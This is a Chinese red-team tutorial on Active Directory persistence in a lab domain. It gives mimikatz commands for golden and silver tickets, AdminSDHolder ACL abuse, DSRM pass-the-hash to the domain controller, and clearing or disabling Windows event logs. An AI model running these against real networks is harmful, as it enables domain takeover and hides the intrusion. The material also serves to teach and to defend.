0x01 金票
可以使用 krbtgt 的 NTLM hash 創建作為任何用戶的有效 TGT。要偽造黃金票據的前提是知道域的 SID 和 krbtgt 賬戶的 hash 或者 AES-256 值。
1.1 收集 krbtgt 密碼信息
privilege::debug
lsadump::lsa /inject /name:krbtgt
得到 krbtgt 的 hash:
c73caed3bc6f0a248e51d37b9a8675fa
域 sid 值:
S-1-5-21-151877218-3666268517-4145415712
1.2 金票利用
使用 mimikatz 偽造 kerberos 票證
生成 gold.kribi
mimikatz "kerberos::golden /domain:redteam.local /sid:S-1-5-21-151877218-3666268517-4145415712
/krbtgt:c73caed3bc6f0a248e51d37b9a8675fa /user:administrator
/ticket:gold.kirbi"
可以看到沒有任何票證。
導入 gold.kribi
kerberos::ptt C:\Users\jack\Desktop\gold.kirbi
成功導入 administrator 票據。
可以通過事件管理器查看到是以 administrator 來登錄的
0x02 銀票
如果我們擁有服務的 hash,就可以給自己簽發任意用戶的 TGS 票據。金票是偽造 TGT 可用於訪問任何 Kerberos 服務,而銀票是偽造 TGS,僅限於訪問針對特定服務器的任何服務。
這裡使用 CIFS 服務,該服務是 windows 機器之間的文件共享。
2.1 獲取 sid
whoami /user
2.2 導出服務賬號的 NTLM Hash
privilege::Debug
sekurlsa::logonpasswords
2.3 創建銀票
kerberos::golden /domain:redteam.local/sid:S-1-5-21-151877218-3666268517-4145415712/target:DC.redteam.local/service:cifs /rc4:0703759771e4bed877ecd472c95693a5/user:administrator /ptt
psexec 獲取 DC 機器 cmd
0x03 AdminSDHolder 組
AdminSDHolder 是一個特殊的 AD 容器,具有一些默認安全權限,用作受保護 AD 賬戶和組的模板,當我們獲取到域控權限,就可以通過授予該用戶對容器進行濫用,使該用戶成為域管。
默認情況下,該組的 ACL 被覆制到所有 “受保護組” 中。這樣做是為了避免有意或無意地更改這些關鍵組。但是,如果攻擊者修改了 AdminSDHolder 組的 ACL,例如授予普通用戶完全權限,則該用戶將擁有受保護組內所有組的完全權限(在一小時內)。如果有人試圖在一小時或更短的時間內從域管理員中刪除此用戶(例如),該用戶將回到組中。
在server2000中引入,默認包含如下的組:
Administrators
DomainAdmins
AccountOperators
BackupOperators
DomainControllers
EnterpriseAdmins
PrintOperators
Replicator
Read-only DomainControllers
SchemaAdmins
ServerOperators
其中 Administrators、Domain Admins、Enterprise Admins 組對 AdminSDHolder 上的屬性具有寫權限,受保護的 ad 賬戶和組的具備 admincount 屬性值為 1 的特徵。
3.1 使用 powerview 查詢
查詢 ad 保護的域的用戶
Get-NetUser-AdminCount|select samaccountname
查詢域中受 ad 保護的所有組
Get-netgroup -AdminCount| select name
3.2 使用 ActiveDirectory
查詢 ad 保護的域中所有的用戶和組
Import-ModuleActiveDirectory
Get-ADObject-LDAPFilter"(&(admincount=1)(|(objectcategory=person)(objectcategory=group)))"|select name
3.3 添加用戶
添加 jack 用戶對其有完全控制權限。
Add-DomainObjectAcl-TargetIdentityAdminSDHolder-PrincipalIdentity jack -RightsAll
然後驗證下,這裡的 sid 為 jack 用戶的。
Get-DomainObjectAcl adminsdholder | ?{$_.SecurityIdentifier-match "S-1-5-21-15187721
8-3666268517-4145415712-1106"} | select objectdn,ActiveDirectoryRights |sort -Unique
默認會等待 60 分鐘,可以通過修改註冊表來設置為 60 秒後觸發。
reg add hklm\SYSTEM\CurrentControlSet\Services\NTDS\Parameters /v AdminSDProtectFrequency/t REG_DWORD /d 1/f
3.4 恢復
恢復觸發時間
reg add hklm\SYSTEM\CurrentControlSet\Services\NTDS\Parameters /v AdminSDProtectFrequency/t REG_DWORD /d 120/f
取消 jack 用戶對 adminSDHolder 的權限
Remove-DomainObjectAcl-TargetSearchBase"LDAP://CN=AdminSDHolder,CN=System,DC=redteam,DC=local"-PrincipalIdentity jack -RightsAll-Verbose
0x04 DSRM 憑證
每個 DC 內部都有一個本地管理員賬戶,在該機器上擁有管理員權限。
4.1 獲取本地管理員 hash
token::elevate
lsadump::sam
得到 hash 為:
852a844adfce18f66009b4f14e0a98de
4.2 檢查是否工作
如果註冊表項的值為 0 或者不存在,需要將其設置為 2。
檢查 key 是否存在並且獲取值:
Get-ItemProperty"HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA"-name DsrmAdminLogonBehavior
如果不存在則創建值為 2 的鍵:
New-ItemProperty"HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA"-name DsrmAdminLogonBehavior-value 2-PropertyType DWORD
如果存在但是不為 2 設置為 2:
Set-ItemProperty"HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA"-name DsrmAdminLogonBehavior-value 2
4.3 PTH 域控
sekurlsa::pth /domain:DC /user:Administrator/ntlm:852a844adfce18f66009b4f14e0a98de/run:powershell.exe
0x05 規避 Windows 事件日誌記錄
在做完一些滲透測試清理痕跡是很有必要的一個環節,包括在一些滲透還未結束也要清理掉一些操作日誌。在情報收集反溯源等等大多都是採用 windows 事件日誌中。
5.1 查看 windows 日誌
5.1.1 事件管理器
5.1.2 powershell
管理員權限運行查看安全類別的日誌:
Get-WinEvent-FilterHashtable@{logname="security";}
5.2 windows 日誌清除方法
5.2.1 wevtutil.exe
統計日誌列表數目信息等:
wevtutil.exe gli Application
wevtutil.exe gli Security
查詢指定類別的 (這裡以 security 舉例):
wevtutil qe Security/f:text
刪除指定類別:
wevtutil cl security
原本大量日誌信息
但是會留下一個事件 id 為 1102 的日誌清除日誌
5.2.2 powershell 清除日誌
查看指定事件 id:
Get-EventLogSecurity-InstanceId4624,4625
刪除指定類別日誌:
Clear-EventLog-LogNameSecurity
5.2.3 Phantom 腳本
該腳本可以讓日誌功能失效,無法記錄。他會遍曆日誌進程的線程堆棧來終止日誌服務線程。
添加一個用戶可以看到產生了日誌
我們再給刪除
運行 ps1 腳本:
再次添加用戶查看日誌:
持久化
————————————————
原文作者:11ccaab
转自链接:https://www.wangan.com/p/7fygf7e4644abd0d
版权声明:著作权归作者所有。商业转载请联系作者获得授权,非商业转载请保留以上作者信息和原文链接。
留言列表
